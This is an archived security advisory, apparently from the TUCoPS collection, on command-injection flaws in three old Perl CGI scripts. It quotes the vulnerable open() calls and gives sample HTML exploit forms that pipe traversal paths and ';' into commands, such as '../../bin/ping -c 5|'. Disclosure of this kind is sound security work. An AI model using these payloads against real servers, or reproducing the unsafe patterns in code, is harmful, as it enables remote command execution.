Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Apps :: thusband.htm

Tammie's HUSBAND scripts ad.cgi insecure input validation vulnerability

    Tammie's HUSBAND scripts


    Tammie's HUSBAND scripts


    'rpc'  found  number  of  bugs  in  "Scripts by Tammie's HUSBAND".
    ad.cgi from  "Scripts by  Tammie's HUSBAND"  contains an  insecure
    input  validation   vulnerability.   Information   on  ad.cgi   is
    available at:

    Code snippet:

        $filename = "$FORM{'file'}";
        $datafile = "$basedir" . "$filename";
        open (INFO, "$datafile");


    <form action="" method=POST>
    <h1>ad.cgi exploit</h1>
    Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5|">
    <input type=submit value=run>

    everythingform.cgi  uses  a  hidden  field  'config'  to determine
    where to read configuration data from.

    Code snippit:

        $ConfigFile = $in{config};
         open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in the ReadConfig subroutine. Reason: $!");

    Information regarding everythingform can be found at:

    Sample exploit:

    <form action="" method=POST>
    <h1>everythingform.cgi exploit</h1>
    Command: <input type=text name=config value="../../../../../../../../bin/ping -c 5|">
    <input type=hidden name=Name value="fuck the religious right">
    <input type=hidden name="e-mail" value="">
    <input type=hidden name=FavoriteColor value=Black>
    <input type=submit value=run>

    simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND"
    Leif Wright.  It's available from:

    The code is self explanatory:

        $youremail = $contents_by_name{'MyEmail'};
        open (MAIL, "|$mailprog $youremail") || die "Can't open $mailprog!\n";

    Exploitation is straight forward:

    <form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
    Command: <input type=text name=MyEmail value=";">
    <input type=hidden name=redirect value="">
    <input type=submit name=submit value="run">


    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH